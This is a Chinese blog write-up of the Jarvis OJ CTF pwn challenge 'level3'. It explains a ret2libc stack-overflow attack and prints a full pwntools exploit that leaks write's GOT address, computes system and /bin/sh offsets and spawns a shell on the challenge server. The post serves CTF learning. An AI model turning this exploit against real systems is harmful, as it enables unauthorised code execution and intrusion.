CTF-PWN-level3(Jarvis OJ)

最新推荐文章于 2023-04-17 15:49:34 发布
最新推荐文章于 2023-04-17 15:49:34 发布
阅读量459 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/87358240
版权

发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。

checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。

基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出覆盖到read函数的返回地址即可。

通过命令

strings -a -t x ./libc-2.19.so | grep "/bin/sh"

即可找到库中/bin/sh地址

具体细节见如下exp:

from pwn import *
context(os='linux',arch='i386',log_level='debug')
p=remote("pwn2.jarvisoj.com",9879)
#p=process("./level3")

elf=ELF("level3")
main_addr=0x08048484
plt_write=elf.plt["write"]
p.recvline()
payload = "A" * 0x8C + p32(plt_write) + p32(main_addr) + p32(1) + p32(elf.got["write"]) + p32(4)
#多函数的调用规律:
#fun1_adr+fun2_adr+....+fun1_args+fun2_args
#根据伪代码write函数的参数,可以推断出我们构造的write函数的参数
p.send(payload)
write_addr=u32(p.recv(4))

libc=ELF("libc-2.19.so")
libc_system=libc.symbols["system"]
libc_binsh=0x162d4c #由上文中的命令直接得到的地址
libc_write=libc.symbols["write"]
system_addr=write_addr-libc_write+libc_system
binsh_addr=write_addr-libc_write+libc_binsh

p.recvline()

payload = "A" * 0x8C  + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr) 
#格式为fun_adr+返回地址+参数,返回地址可以随意调用

p.sendline(payload)

p.interactive()

 

 

SuperGate
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【攻防世界pwn-level3】
a_silly_coder的博客
02-17 3259
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
ctf】xctf攻防世界level3!!
elsa________的博客
04-05 1560
level3题解: 首先,检查一下程序基本信息: 程序很简单,保护开的也差不多。但是需要注意,这道题单独给出了libc,而且根据题目提示,程序中没有现成的system函数。这就需要我们从libc中动态加载system函数。 初步思路:PIE没有开启,那么在libc中函数的offset就是固定的,只要确认了libc的base address,然后计算出system函数的offset,就可以定位...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 896
攻防世界pwn-level3详细题解。
GUI入门路(MISC小工具)——基于wxPython的一次小尝试
cossack9989的博客
12-20 862
之前有个同学吐槽一些HEXeditor不够优秀,想着要是有一个功能强大到能秒中低难度MISC题的工具就好了。 刚好最近下了个wxFormBuilder玩玩,就对着以前的脚本写了个肥肠简陋的GUI出来,只有很少的功能TAT: 查MD5查SHA1查CRC32查文件头尾 (我觉得还可以加几个功能上去) (开始画饼) (比如说检测可疑文件头出现次数,检测可疑字符串(专怼加密文件),对比文件b
PWN做题笔记6-Level3(got表做ret2libc)
qq_40923256的博客
04-21 332
原题地址https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5060&page=1 题目包含一个ELF文件level3和一个libc库 是32位ELF文件,采用动态链接库 未开启ALSR ida反汇编,main函数write: 该函数存在溢出点: 但是LEVEL3没有提供system函数和/bin/sh字符串,因此要从动态库找。 这里要提及一下如何确定动...
pwn level3
weixin_45677731的博客
03-15 522
解压之后有一个level3和libc_32.so.6,拖进ida(32位) 主要就是这两个函数,一个write和一个read 这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出 对于writ...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
攻防世界pwn——level3
qq_62076255的博客
11-05 611
攻防世界pwn——level3
攻防世界 Pwn level3
MrTreebook的博客
11-22 283
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2302
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1651
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
Writeup of level3(Pwn) in JarvisOJ
cossack9989的博客
02-14 1541
又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?) 不扯了,看题。 0x00 checksec 拿到文件先查checksec,得到如下信息: root@kali:~/Desktop/Pwn/level3# checksec level3 [*] '/root/Desktop/Pwn/level3/level3' Arch: i386-32-l
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 948
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
Jarvis OJ-PWN-[XMAN]level3 wp
分不清东西南北的Laffey
10-15 687
地址:nc pwn2.jarvisoj.com 9879 一开始拿到题目的时候是一个rar文件 解压后就得到了两个文件 对这两个文件查看保护 两个文件都是32位的 level3没有开启栈保护 可以利用栈溢出;栈中内容不可使用 不用shellcode libc-2.19.so可以看到是全部都开启了 用IDA32打开level3 跟进vulnerable_function()函数 溢出点在r...
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 223
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值